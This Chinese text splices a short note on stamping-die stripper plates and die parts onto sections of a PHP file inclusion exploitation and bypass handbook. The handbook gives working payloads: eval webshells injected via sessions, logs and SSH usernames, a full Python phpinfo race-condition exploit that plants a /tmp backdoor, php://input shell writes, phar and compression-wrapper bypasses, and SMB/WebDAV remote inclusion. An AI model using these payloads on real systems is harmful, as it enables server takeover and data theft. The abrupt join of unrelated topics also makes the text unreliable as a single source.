“脱”,当然不是指脱光的意思哈。脱光这个理解也没有什么失误,呵呵。这里的脱的确就是指脱光、脱开的意思,意思就是说把材料或者产品从模具上卸下来,俗称“脱料”,当产品卡在模具上下不来的时候,俗称“不脱料”,在修理模具问题的时候,经常会碰到“不脱料”的问题,比如“xx模具不脱料了,你去修理一下!”,就是指产品粘在模具上下不来的意思。
冲压模脱板的作用是什么呢?当然第一个作用首先是脱料了,即把产品从模具上卸下来,想想他还有没有别的作用呢?当模具闭合的时候它是什么样子的呢?
哈哈,想到了吧?当然是要和下模板配合到一起了,和下模板配合到一起是为了达到什么目的呢?当然就是压料啦。想到了没呢?
综合起来,冲压模脱板的作用有两个,一是脱料、把产品脱开;第二个就是压料,把材料压住,以便进行折弯、冲孔等工序。
你也可以这样说,冲压模脱板的作用就是脱料和压料。这样也可以,表达的很清楚,通俗易懂。
★构成一幅比较完整的冲模一般应具备哪些零部件
构成一幅比较完整的冲模一般应具备的零部件有:模板、入块、以及标准件等;
模板包括:上下托板、上下垫脚、上下模座,上、下模板,上、下垫板,上、下夹板,止挡板、脱料板,凹模、凸模,也称冲头 或 刀口等;
入块(上模):夹板入块、脱料板入块、冲头等;
入块(下模):下模入块、下模刀口、浮块、定位入子等;
标准件:弹簧、六角螺丝、止付螺丝、线簧、等高套、导柱、导套、等高套垫片、两用销、顶料销等;
非标准件:外定位、内定位、节距定位、外限位柱、内限位柱等;
接上一篇:PHP文件包含漏洞利用思路与Bypass总结手册(一)
包含Session
在了解session包含文件漏洞及绕过姿势的时候,我们应该首先了解一下服务器上针对用户会话session的存储与处理是什么过程,只有了解了其存储和使用机制我们才能够合理的去利用它得到我们想要的结果。
Session存储
存储方式
Java是将用户的session存入内存中,而PHP则是将session以文件的形式存储在服务器某个文件中,可以在php.ini里面设置session的存储位置session.save_path。
可以通过phpinfo查看session.save_path的值
知道session的存储后,总结常见的php-session默认存放位置是很有必要的,因为在很多时候服务器都是按照默认设置来运行的,这个时候假如我们发现了一个没有安全措施的session包含漏洞就可以尝试利用默认的会话存放路径去包含利用。
默认路径
命名格式
如果某个服务器存在session包含漏洞,要想去成功的包含利用的话,首先必须要知道的是服务器是如何存放该文件的,只要知道了其命名格式我们才能够正确的去包含该文件。
session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到。
会话处理
在了解了用户会话的存储下来就需要了解php是如何处理用户的会话信息。php中针对用户会话的处理方式主要取决于服务器在php.ini或代码中对
session.serialize_handler的配置。
session.serialize_handler
PHP中处理用户会话信息的主要是下面定义的两种方式
session.serialize_handler = php 一直都在(默认方式) 它是用 |分割session.serialize_handler = php_serialize php5.5之后启用 它是用serialize反序列化格式分割
下面看一下针对PHP定义的不同方式对用户的session是如何处理的,我们只有知道了服务器是如何存储session信息的,才能够往session文件里面传入我们所精心制作的恶意代码。
session.serialize_handler=php
服务器在配置文件或代码里面没有对session进行配置的话,PHP默认的会话处理方式就是session.serialize_handler=php这种模式机制。
下面通过一个简单的用户会话过程了解session.serialize_handler=php是如何工作的。
session.php
从图中可以看到默认session.serialize_handler=php处理模式只对用户名的内容进行了序列化存储,没有对变量名进行序列化,可以看作是服务器对用户会话信息的半序列化存储过程。
session.serialize_handler=php_serialize
php5.5之后启用这种处理模式,它是用serialize反序列化格式进行存储用户的会话信息。一样的通过一个简单的用户会话过程了解session.serialize_handler=php_serialize是如何工作的。这种模式可以在php.ini或者代码中进行设置。
session.php
从图中可以看到session.serialize_handler=php_serialize处理模式,对整个session信息包括文件名、文件内容都进行了序列化处理,可以看作是服务器对用户会话信息的完全序列化存储过程。
对比上面session.serialize_handler的两种处理模式,可以看到他们在session处理上的差异,既然有差异我们就要合理的去利用这两种处理模式,假如编写代码不规范的时候处理session同时用了两种模式,那么在攻击者可以利用的情况下,很可能会造成session反序列化漏洞。
Session利用
介绍了用户会话的存储和处理机制后,我们就可以去深入的理解session文件包含漏洞。LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如Session会话文件、日志文件、临时文件等。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。
其中针对LFI Session文件的包含或许是现在见的比较多,简单的理解session文件包含漏洞就是在用户可以控制session文件中的一部分信息,然后将这部分信息变成我们的精心构造的恶意代码,之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。下面通过一个简单的案例演示这个漏洞利用攻击的过程。
测试代码
session.php
index.php
<?php $file = $_GET['file']; include($file);?>
漏洞利用
利用条件:session文件路径已知,且其中内容部分可控。
利用姿势:
分析session.php可以看到用户会话信息username的值用户是可控的,因为服务器没有对该部分作出限制。那么我们就可以传入恶意代码就行攻击利用
payload
http://192.33.6.145/FI/session/session.phpPOSTusername=<?php eval($_REQUEST[Qftm]);?>
可以看到有会话产生,同时我们也已经写入了我们的恶意代码。
既然已经写入了恶意代码,下来就要利用文件包含漏洞去包含这个恶意代码,执行我们想要的结果。借助上一步产生的sessionID进行包含利用构造相应的payload。
payload
PHPSESSID:7qefqgu07pluu38m45isiesq3sindex.php?file=/var/lib/php/sessions/sess_7qefqgu07pluu38m45isiesq3sPOSTQftm=system('whoami');
从攻击结果可以看到我们的payload和恶意代码确实都已经正常解析和执行。
包含日志
访问日志
利用条件:
1、需要知道服务器日志的存储路径2、日志文件可读
利用姿势:
很多时候,web服务器会将请求写入到日志文件中,比如说apache。在用户发起请求时,会将请求写入access.log,当发生错误时将错误写入error.log。
默认情况下apache log的位置:
Debian分支(Ubuntu等) /var/log/apache2/access.logFedora分支(Centos等) /var/log/httpd/access_log
如果是直接发起请求,会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。
利用LFI:
index.php?file=../../../../../var/log/apache2/access.log
当日志文件没有Read权限时则会返回bool(false)
ps:在一些场景中,log的地址是被修改掉的。你可以通过读取相应的配置文件后,再进行包含。
SSH日志
利用条件:
1、需要知道ssh-log的位置2、日志文件可读
利用姿势:
默认情况下ssh log的位置:
Debian分支(Ubuntu等) /var/log/auth.logFedora分支(Centos等) /var/log/secure
用ssh连接:
→ Qftm ← :~# ssh '<?php phpinfo(); ?>'@remotehost
之后会提示输入密码等等,随便输入,然后在remotehost的ssh-log中即可写入php代码:
利用LFI:
index.php?file=../../../../../var/log/auth.log
包含environ
php的4种常见运行方式
SAPI:Server Application Programming Interface服务端应用编程端口。他就是php与其他应用交互的接口,php脚本要执行有很多中方式,通过web服务器,或者直接在命令行行下,也可以嵌入其他程序中。SAPI提供了一个和外部通信的接口,常见的SAPI有:cgi、fast-cgi、cli、Web模块模式等。
CGI
CGI即通用网关接口(common gatewag interface),它是一段程序,通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执 行程序,再把服务器执行程序的结果返还给HTML页。CGI 的跨平台性能极佳,几乎可以在任何操作系统上实现。CGI已经是比较老的模式了,这几年都很少用了。
CGI方式在遇到连接请求(用户 请求)先要创建cgi的子进程,激活一个CGI进程,然后处理请求,处理完后结束这个子进程。这就是fork-and-execute模式。所以用cgi 方式的服务器有多少连接请求就会有多少cgi子进程,子进程反复加载是cgi性能低下的主要原因。都会当用户请求数量非常多时,会大量挤占系统的资源如内 存,CPU时间等,造成效能低下。
FastCGI
fast-cgi 是cgi的升级版本,FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行着,只要激活后,不会每次都要花费时间去fork一 次。PHP使用PHP-FPM(FastCGI Process Manager),全称PHP FastCGI进程管理器进行管理。
Web Server启动时载入FastCGI进程管理器(IIS ISAPI或Apache Module)。FastCGI进程管理器自身初始化,启动多个CGI解释器进程(可见多个php-cgi)并等待来自Web Server的连接。
当客户端请求到达Web Server时,FastCGI进程管理器选择并连接到一个CGI解释器。Web server将CGI环境变量和标准输入发送到FastCGI子进程php-cgi。
FastCGI子进程完成处理后将标准输出和错误信息从同一连接返回Web Server。当FastCGI子进程关闭连接时,请求便告处理完成。FastCGI子进程接着等待并处理来自FastCGI进程管理器(运行在Web Server中)的下一个连接。在CGI模式中,php-cgi在此便退出了。
在上述情况中,你可以想象CGI通常有多慢。每一个Web 请求PHP都必须重新解析php.ini、重新载入全部扩展并重初始化全部数据结构。使用FastCGI,所有这些都只在进程启动时发生一次。一个额外的 好处是,持续数据库连接(Persistent database connection)可以工作。
模块模式
Apache 2.0 Handler
PHP作为Apache模块,Apache服务器在系统启动后,预先生成多个进程副本驻留在内存中,一旦有请求出 现,就立即使用这些空余的子进程进行处理,这样就不存在生成子进程造成的延迟了。这些服务器副本在处理完一次HTTP请求之后并不立即退出,而是停留在计算机中等待下次请求。对于客户浏览器的请求反应更快,性能较高。
CLI
cli是php的命令行运行模式,大家经常会使用它,但是可能并没有注意到(例如:我们在linux下经常使用 “php -m”查找PHP安装了那些扩展就是PHP命令行运行模式)。
phpinfo 查看SAPI
CGI
利用条件:
1、php以cgi方式运行,这样environ才会保存UA头。2、environ文件存储位置已知,且environ文件可读。
利用姿势:
proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到environ中。之后再包含它,即可。
包含临时文件
假如在服务器上找不到我们可以包含的文件,那该怎么办,此时可以通过利用一些技巧让服务存储我们恶意生成的临时文件,该临时文件包含我们构造的的恶意代码,此时服务器就存在我们可以包含的文件。
目前,常见的两种临时文件包含漏洞利用方法主要是:
PHPINFO() and PHP7 Segment Fault,利用这两种奇技淫巧可以向服务器上传文件同时在服务器上生成恶意的临时文件,然后将恶意的临时文件包含就可以达到任意代码执行效果也就可以拿到服务器权限进行后续操作。
临时文件
在了解漏洞利用方式的时候,先来了解一下PHP临时文件的机制
全局变量
在PHP中可以使用POST方法或者PUT方法进行文本和二进制文件的上传。上传的文件信息会保存在全局变量$_FILES里。
$_FILES超级全局变量很特殊,他是预定义超级全局数组中唯一的二维数组。其作用是存储各种与上传文件有关的信息,这些信息对于通过PHP脚本上传到服务器的文件至关重要。
$_FILES['userfile']['name'] 客户端文件的原名称。$_FILES['userfile']['type'] 文件的 MIME 类型,如果浏览器提供该信息的支持,例如"image/gif"。$_FILES['userfile']['size'] 已上传文件的大小,单位为字节。$_FILES['userfile']['tmp_name'] 文件被上传后在服务端储存的临时文件名,一般是系统默认。可以在php.ini的upload_tmp_dir 指定,默认是/tmp目录。$_FILES['userfile']['error'] 该文件上传的错误代码,上传成功其值为0,否则为错误信息。$_FILES['userfile']['tmp_name'] 文件被上传后在服务端存储的临时文件名
在临时文件包含漏洞中$_FILES['userfile']['name']这个变量值的获取很重要,因为临时文件的名字都是由随机函数生成的,只有知道文件的名字才能正确的去包含它。
存储目录
文件被上传后,默认会被存储到服务端的默认临时目录中,该临时目录由php.ini的
upload_tmp_dir属性指定,假如upload_tmp_dir的路径不可写,PHP会上传到系统默认的临时目录中。
不同系统服务器常见的临时文件默认存储目录,了解系统的默认存储路径很重要,因为在很多时候服务器都是按照默认设置来运行的。
Linux目录
Linxu系统服务的临时文件主要存储在根目录的tmp文件夹下,具有一定的开放权限。
/tmp/
Windows目录
Windows系统服务的临时文件主要存储在系统盘Windows文件夹下,具有一定的开放权限。
C:/Windows/C:/Windows/Temp/
命名规则
存储在服务器上的临时文件的文件名都是随机生成的,了解不同系统服务器对临时文件的命名规则很重要,因为有时候对于临时文件我们需要去爆破,此时我们必须知道它的命名规则是什么。
可以通过phpinfo来查看临时文件的信息。
Linux Temporary File
Linux临时文件主要存储在/tmp/目录下,格式通常是(/tmp/php[6个随机字符])
Windows Temporary File
Windows临时文件主要存储在C:/Windows/目录下,格式通常是(C:/Windows/php[4个随机字符].tmp)
PHPINFO()
通过上面的介绍,服务器上存储的临时文件名是随机的,这就很难获取其真实的文件名。不过,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名,进而进行包含。
测试代码
index.php
phpinfo.php
漏洞分析
当我们在给PHP发送POST数据包时,如果数据包里包含文件区块,无论你访问的代码中有没有处理文件上传的逻辑,PHP都会将这个文件保存成一个临时文件。文件名可以在$_FILES变量中找到。这个临时文件,在请求结束后就会被删除。
利用phpinfo的特性可以很好的帮助我们,因为phpinfo页面会将当前请求上下文中所有变量都打印出来,所以我们如果向phpinfo页面发送包含文件区块的数据包,则即可在返回包里找到$_FILES变量的内容,拿到临时文件变量名之后,就可以进行包含执行我们传入的恶意代码。
漏洞利用
利用条件
无 PHPINFO的这种特性源于php自身,与php的版本无关
测试脚本
探测是否存在phpinfo包含临时文件信息
运行脚本可以看到回显中有如下内容
Linux
Windows
利用原理
验证了phpinfo的特性确实存在,所以在文件包含漏洞找不到可利用的文件时,我们就可以利用这一特性,找到并提取临时文件名,然后包含之即可Getshell。
但文件包含漏洞和phpinfo页面通常是两个页面,理论上我们需要先发送数据包给phpinfo页面,然后从返回页面中匹配出临时文件名,再将这个文件名发送给文件包含漏洞页面,进行getshell。在第一个请求结束时,临时文件就被删除了,第二个请求自然也就无法进行包含。
利用过程
这个时候就需要用到条件竞争,具体原理和过程如下:
(1)发送包含了webshell的上传数据包给phpinfo页面,这个数据包的header、get等位置需要塞满垃圾数据
(2)因为phpinfo页面会将所有数据都打印出来,1中的垃圾数据会将整个phpinfo页面撑得非常大
(3)php默认的输出缓冲区大小为4096,可以理解为php每次返回4096个字节给socket连接
(4)所以,我们直接操作原生socket,每次读取4096个字节。只要读取到的字符里包含临时文件名,就立即发送第二个数据包
(5)此时,第一个数据包的socket连接实际上还没结束,因为php还在继续每次输出4096个字节,所以临时文件此时还没有删除
(6)利用这个时间差,第二个数据包,也就是文件包含漏洞的利用,即可成功包含临时文件,最终getshell
(参考ph牛:https://github.com/vulhub/vulhub/tree/master/php/inclusion)
Getshell
exp.py
#!/usr/bin/python#python version 2.7import sysimport threadingimport socketdef setup(host, port): TAG = "Security Test" PAYLOAD = """%s\r<?php file_put_contents('/tmp/Qftm', '<?php eval($_REQUEST[Qftm])?>')?>\r""" % TAG # PAYLOAD = """%s\r # <?php file_put_contents('/var/www/html/Qftm.php', '<?php eval($_REQUEST[Qftm])?>')?>\r""" % TAG REQ1_DATA = """-----------------------------7dbff1ded0714\rContent-Disposition: form-data; name="dummyname"; filename="test.txt"\rContent-Type: text/plain\r\r%s-----------------------------7dbff1ded0714--\r""" % PAYLOAD padding = "A" * 5000 REQ1 = """POST /phpinfo.php?a=""" + padding + """ HTTP/1.1\rCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\rHTTP_ACCEPT: """ + padding + """\rHTTP_USER_AGENT: """ + padding + """\rHTTP_ACCEPT_LANGUAGE: """ + padding + """\rHTTP_PRAGMA: """ + padding + """\rContent-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\rContent-Length: %s\rHost: %s\r\r%s""" % (len(REQ1_DATA), host, REQ1_DATA) # modify this to suit the LFI script LFIREQ = """GET /index.php?file=%s HTTP/1.1\rUser-Agent: Mozilla/4.0\rProxy-Connection: Keep-Alive\rHost: %s\r\r\r""" return (REQ1, TAG, LFIREQ)def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s2.connect((host, port)) s.send(phpinforeq) d = "" while len(d) < offset: d += s.recv(offset) try: i = d.index("[tmp_name] => ") fn = d[i + 17:i + 31] except ValueError: return None s2.send(lfireq % (fn, host)) d = s2.recv(4096) s.close() s2.close() if d.find(tag) != -1: return fncounter = 0class ThreadWorker(threading.Thread): def __init__(self, e, l, m, *args): threading.Thread.__init__(self) self.event = e self.lock = l self.maxattempts = m self.args = args def run(self): global counter while not self.event.is_set(): with self.lock: if counter >= self.maxattempts: return counter += 1 try: x = phpInfoLFI(*self.args) if self.event.is_set(): break if x: print "\nGot it! Shell created in /tmp/Qftm.php" self.event.set() except socket.error: returndef getOffset(host, port, phpinforeq): """Gets offset of tmp_name in the php output""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(phpinforeq) d = "" while True: i = s.recv(4096) d += i if i == "": break # detect the final chunk if i.endswith("0\r\n\r\n"): break s.close() i = d.find("[tmp_name] => ") if i == -1: raise ValueError("No php tmp_name in phpinfo output") print "found %s at %i" % (d[i:i + 10], i) # padded up a bit return i + 256def main(): print "LFI With PHPInfo()" print "-=" * 30 if len(sys.argv) < 2: print "Usage: %s host [port] [threads]" % sys.argv[0] sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) except socket.error, e: print "Error with hostname %s: %s" % (sys.argv[1], e) sys.exit(1) port = 80 try: port = int(sys.argv[2]) except IndexError: pass except ValueError, e: print "Error with port %d: %s" % (sys.argv[2], e) sys.exit(1) poolsz = 10 try: poolsz = int(sys.argv[3]) except IndexError: pass except ValueError, e: print "Error with poolsz %d: %s" % (sys.argv[3], e) sys.exit(1) print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() maxattempts = 1000 e = threading.Event() l = threading.Lock() print "Spawning worker pool (%d)..." % poolsz sys.stdout.flush() tp = [] for i in range(0, poolsz): tp.append(ThreadWorker(e, l, maxattempts, host, port, reqphp, offset, reqlfi, tag)) for t in tp: t.start() try: while not e.wait(1): if e.is_set(): break with l: sys.stdout.write("\r% 4d / % 4d" % (counter, maxattempts)) sys.stdout.flush() if counter >= maxattempts: break print if e.is_set(): print "Woot! \m/" else: print ":(" except KeyboardInterrupt: print "\nTelling threads to shutdown..." e.set() print "Shuttin' down..." for t in tp: t.join()if __name__ == "__main__": main()
运行脚本Getshell
包含生成/tmp/Qftm后门文件
拿到RCE之后,可以查看tmp下生成的后门文件
http://192.33.6.145/index.php?file=/tmp/Qftm&Qftm=system(%27ls%20/tmp/%27)
然后使用后门管理工具连接后门webshell
/tmp/Qftm <?php eval($_REQUEST[Qftm])?>
包含上传文件
利用条件:千变万化,不过至少得知道上传的文件在哪,叫什么名字!!!
利用姿势:不说了,太多了!!!
其它包含
一个web服务往往会用到多个其他服务,比如ftp服务、smb服务、数据库等等。这些应用也会产生相应的文件,但这就需要具体情况具体分析。这里就不展开了。
......未完待续
合天网安实验室相关实验推荐==文件包含漏洞(文件包含分为远程文件和本地文件包含,总结分析程序漏洞和服务器配置容易犯的错误。)
前言
这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结。
相关函数
四个函数
php中引发文件包含漏洞的通常主要是以下四个函数:
1、include()
http://www.php.net/manual/en/function.include.php
2、include_once()
http://php.net/manual/en/function.include-once.php
3、require()
http://php.net/manual/en/function.require.php
4、require_once()
http://php.net/manual/en/function.require-once.php
函数功能
当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。
函数差异
include()
include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行
require()
require() 函数包含出错的话,则会直接退出,后续语句不在执行
include_once() 和 require_once()
require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。
二次包含
一次包含
漏洞原因
文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。
漏洞分类
LFI
LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。
例如本地读取/etc/passwd系统重要文件
RFI
RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFI的利用条件较为苛刻,需要php.ini中进行配置
allow_url_fopen = On该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。
allow_url_include:On该选项为on便是允许 包含URL 对象文件等。
两个配置选项均需要为On,才能远程包含文件成功
修改php.ini
在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。
php5.5.9 -> php.ini
包含姿势
php伪协议
PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。
可以在phpinfo中的Registered PHP Streams中找到可使用的协议。
下面测试代码均为:
若有特殊案例,会声明。
php.ini
若有特殊要求,会在利用条件里指出。
php://filter
php://filter
是一种元封装器, 设计用于数据流打开时的筛选过滤应用。
参数
过滤器列表
字符串过滤器string.strip_tags转换过滤器压缩过滤器加密过滤器可用过滤器列表:https://www.php.net/manual/zh/filters.php
利用条件:无
利用姿势1:
index.php?file=php://filter/read=convert.base64-encode/resource=index.php
通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。
利用姿势2:
index.php?file=php://filter/convert.base64-encode/resource=index.php
效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。
file://
专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取
用法:
利用条件:无
利用姿势:
php://input
php://input是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。
利用条件:
利用姿势:
也可以使用burpsuite或curl进行利用
curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"
Getshell
POST:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>
file_get_contents()的利用
file_get_contents()
函数将整个文件读入一个字符串中
测试代码
利用条件:无
利用姿势:
php://input
可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。enctype=”multipart/form-data” 的时候 php://input 是无效的。
phar://
phar:// 支持zip、phar格式的文件包含。
zip
用法:
利用条件:php >= 5.3.0
利用姿势1:
配合文件上传漏洞,当仅可以上传zip格式时
index.php?file=phar://index.zip/index.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt
新建index.txt,使用zip格式压缩 -> index.zip
利用姿势2:
配合文件上传漏洞,当仅可以上传图片格式时
针对phar://不管后缀是什么,都会当做压缩包来解压。
index.php?file=phar://head.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt
将做好的zip后缀改为png格式
phar
phar文件本质上是也一种压缩文件。
用法:
?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]
制作phar文件:
制作包含恶意代码文件的phar文件
(1)确保本地php.ini中phar.readonly=Off
(2)编写恶意phar文件的php脚本
phar.php
<?php@unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $phar->addFromString("head.txt", "<?php phpinfo();?>"); //添加要压缩的文件及内容 //签名自动计算 $phar->stopBuffering();?>
(3)生成phar文件
利用条件:php >= 5.3.0
利用姿势1:
index.php?file=phar://phar.phar/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt
利用姿势2:
index.php?file=phar://phar.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt
利用协议特性,更改后缀文件可适当绕过一些限制
zip://
zip协议和phar协议类似,都支持相对路径和绝对路径(几乎网上所有人都说zip协议不支持相对路径,事实上是可以!!!)
在php version 5.2.9时已经修复zip://相对路径问题
使用zip协议,需将#编码为%23(浏览器时)
用法:
利用条件:php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)
利用姿势1:
index.php?file=zip://head.zip%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt
利用姿势2:
针对zip://不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。
index.php?file=zip://head.png%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt
相对路径
php5.3.29 windows
php5.5.9 windows
5.4.16 Linux Centos7
绝对路径
windwos
Linux Centos7
bzip2://
用法:
?file=compress.bzip2://[压缩包文件相对路径]?file=compress.bzip2://[压缩包文件绝对路径]
利用条件:php >= 5.2
利用姿势1:
index.php?file=compress.bzip2://head.bz2index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2
相对路径
绝对路径
利用姿势2:
利用协议特性,更改后缀文件可适当绕过一些限制
index.php?file=compress.bzip2://head.jpgindex.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
zlib://
用法:
?file=compress.zlib://[压缩包文件相对路径]?file=compress.zlib://[压缩包文件绝对路径]
利用条件:php >= 5.2
利用姿势1:
index.php?file=compress.zlib://head.gzindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz
相对路径
绝对路径
利用姿势2:
利用协议特性,更改后缀文件可适当绕过一些限制
index.php?file=compress.zlib://head.jpgindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
data://
数据流封装器,和php://相似都是利用了流的概念
用法:
利用条件
利用姿势1:
......未完待续
合天网安实验室相关实验推荐--文件包含漏洞-中级篇 (介绍文件包含时绕过限制的原理,以及介绍利用文件包含漏洞读取源码的原理。)
绕过姿势
我们平常很多时候碰到的情况肯定不会是简单的
include $_GET['file'];
这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。
现在代码常做的限制有这些:
1、指定前缀
2、指定后缀
3、协议限制
4、allow_url_fopen=Off
Bypass-指定前缀
测试代码:
一般情况下,这种前缀也是很常见的,限制用户访问www服务外的其他文件。下面就看看有哪些方式可以绕过这个限制。
LFI-目录遍历
利用条件:../未被过滤
利用姿势:
LFI-编码绕过
很多时候后台代码都会对用户输入的数据进行检测过滤,常见的就是在敏感字符前加 \ 进行转义,但通过编码可以绕过它的检测。
url编码:
二次编码:
某些web容器支持的编码方式:
Bypass-指定后缀
测试代码:
一般情况下,这种类似后缀也是很常见的,限制用户的访问。下面就看看有哪些方式可以绕过这个限制。
RFI-URL
url格式
利用姿势2:
LFI-压缩协议
利用条件:
1、php >= 5.3.02、已知限制
利用姿势:依据限制构造特定zip包
利用测试代码,依据限制构造特定压缩包:
利用phar协议:
相对路径 Linux Centos7
绝对路径 Linux Centos7
利用zip协议:
绝对路径 Linux Centos7
LFI-长度截断
利用条件:php < 5.2.8
LFI-零字节截断
利用条件:
利用姿势:
php version 5.3.4时已修复 零字节截断
漏洞
Bypass-协议限制
data://
如果在我们使用文件包含漏洞时data://协议被限制,但是我们又想要使用的话该怎么绕过,比如下面这段限制代码
分析代码可知filename变量内容开头不能出现data字符串,这就限制了data://协议的使用,不过我们可以利用zlib协议嵌套的方法绕过data://协议的限制。
利用姿势:
index.php?filename=compress.zlib://data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
限制
绕过
Bypass-allow_url_include
对于RFI的缺陷,先来看一下PHP针对allow_url_fopen和allow_url_include的配置说明php7.x -> php.ini
;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen=On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include=Off
从配置中可以看到 allow_url_fopen和allow_url_include主要是针对两种协议起作用:http://、 ftp://。
PHP针对RFI URL包含限制主要是利用allow_url_include=Off来实现,将其设置为Off,可以让PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。那么,我们是不是可以这样想,有没有什么其它协议可以让我们去包含远程服务器文件,答案是肯定的,例如SMB、WebDAV等协议。
既然这样,攻击者就可以利用这个缺陷,使用相应的协议进行Bypass。在这个过程中,即使allow_url_fopen和allow_url_include都设置为Off,PHP也不会阻止相应的远程文件加载。
RFI-SMB
测试代码
攻击原理
unc -> smb
攻击场景
当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。
环境配置
PHP环境设置
首先,在受害者主机上配置php.ini,将allow_url_fopen和allow_url_include设置为Off
然后重启服务查看phpinfo()配置是否生效
SAMBA服务器环境配置
使用匿名读取访问权限配置SAMBA服务器
Samba是在Linux和UNIX系统上实现SMB协议的一个软件
安装SAMBA服务器:apt-get install samba
创建SMB共享目录和 php web shell:
配置新创建的SMB共享目录的权限:
编辑samba配置文件 /etc/samba/smb.conf
重新启动SAMBA服务器以应用配置文件/etc/samba/smb.conf中的新配置
service smbd restart
成功重新启动SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求凭据。
Getshell
在环境都配置完之后,利用samba目录/var/www/html/pub中共享的WebShell进行GetShell
蚁剑连接
Get shell:
SMB总结
针对smb利用的局限性,因为这种unc只能是在windows下使用,而且,smb端口(445)在国内已经被封杀的差不多了(勒索病毒!!!),很难应用到实际中,但是其他的像webdav这种同理也是可以被包含的,且利用的价值更大。
RFI-WebDAV
WebDAV(Web 分布式创作和版本管理)是一项基于 HTTP/1.1 协议的通信协议。它扩展了HTTP/1.1 协议,在Get、Post、Put、Delete 等HTTP标准方法外添加了新方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)和解锁(Unlock),以及文件的版本控制。
PHP在远程匿名加载WebDAV所共享的文件时并不会对其进行拦截。
测试代码
攻击原理
类unc -> WebDAV
攻击场景
